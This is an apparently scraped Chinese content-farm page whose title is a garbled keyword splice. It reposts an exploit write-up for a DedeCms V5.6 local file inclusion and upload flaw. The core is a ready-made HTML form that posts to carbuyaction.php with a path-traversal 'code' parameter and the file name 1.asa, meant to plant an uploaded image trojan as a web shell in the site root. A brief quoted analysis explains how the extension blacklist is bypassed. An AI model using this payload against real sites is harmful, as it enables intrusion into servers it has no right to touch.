首页 爱情文章 亲情文章 友情文章 生活随笔 校园文章 经典文章 人生哲理 励志文章 搞笑文章 心情日记
  • 爱情文章
  • 亲情文章
  • 友情文章
  • 生活随笔
  • 校园文章
  • 经典文章
  • 人生哲理
  • 励志文章
  • 搞笑文章
  • 心情日记
  • 英语文章
  • 范文大全
  • 作文大全
  • 新闻阅读
    •
    当前位置: 山茶花美文网 > 校园文章 > 正文

    V打印文件不能上传 DedeCms,V5.6,本地包含里的上传漏洞(可是那包含漏洞已经公布)

    时间:2020-02-18来源:山茶花美文网 本文已影响 山茶花美文网手机站

    DedeCmsV5.6 本地包含

    DedeCmsV5.6 本地包含

    http://t00ls.net/thread-8608-1-1.html

    之前就发现了这本地包含的利用方法。

    复制代码代码如下:

    <form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch">

    <input type="hidden" name="newname" value="1.asa">

    <input type="file" name="uploadfile">

    <input type="submit" value="搜索" name="QuickSearchBtn">

    </form>

    上传一个图片木马(只改后辍名为图片类型就行),即可在网站根目录生成 1.asa 文件

    简单分析:

    文件:select_soft_post.php

    复制代码代码如下:

    <?php

    if(!isset($cfg_basedir))

    {

    include_once(dirname(__FILE__)."/config.php");

    }

    //config.php 是用于验证是否管理员。由于本地包含, $cfg_basedir 已经设置了值,应该跳过了验证。

    //文件名(前为手工指定, 后者自动处理)

    if(!empty($newname))

    {

    $filename = $newname;

    if(!ereg(".", $filename)) $fs = explode(".", $uploadfile_name);

    else $fs = explode(".", $filename);

    if(eregi($cfg_not_allowall, $fs[count($fs)-1]))

    {

    ShowMsg("你指定的文件名被系统禁止!","javascript:;");

    exit();

    }

    if(!ereg(".", $filename)) $filename = $filename.".".$fs[count($fs)-1];

    }else{

    $filename = $cuserLogin->getUserID()."-".dd2char(MyDate("ymdHis",$nowtme));

    $fs = explode(".", $uploadfile_name);

    if(eregi($cfg_not_allowall, $fs[count($fs)-1]))

    {

    ShowMsg("你上传了某些可能存在不安全因素的文件,系统拒绝操作!","javascript:;");

    exit();

    }

    $filename = $filename.".".$fs[count($fs)-1];

    }

    问题就出在 $newname 那里,没验证上传类型,但验证了非可上传类型

    //这里强制限定的某些文件类型禁止上传

    $cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";

    即可以上传非上面类型的文件,有时也并不鸡肋。。

    • 爱情文章
    • 亲情文章
    • 友情文章
    • 随笔
    • 哲理
    • 励志
    • 范文大全

    最新文章

    热点文章

    推荐访问

    军训远足心得体会 军训爬山心得体会 大学军训徒步拉练感想 军训徒步作文 军训徒步10公里感想 军训徒步心得体会 5分钟演讲中秋节节日 中秋一分钟演讲 中秋节演讲稿4分钟 中秋节演讲稿一分钟 中秋节演讲稿五分钟 3-5分钟 中秋节短篇演讲稿 中秋节演讲稿两分钟 中秋节的演讲稿3分钟 关于中秋节的演讲稿三分钟 孩子体验军训的心得 参加孩子军训活动的感受与收获 家长对孩子军训后的收获和感悟 小孩军训的收获与感悟 学生军训的收获与感悟 孩子军训成长过程家长感悟 孩子军训感悟 孩子军训心得体会 孩子军训的收获与感悟 兵役前训练心得体会 部队当兵的心得 新兵役前教育训练心得体会 预备役军训心得体会 新兵军训感悟

    本文V打印文件不能上传 DedeCms,V5.6,本地包含里的上传漏洞(可是那包含漏洞已经公布)由山茶花美文网整理提供,版权归原作者、原出处所有。

    Copyright © 山茶花美文网 All Rights Reserved.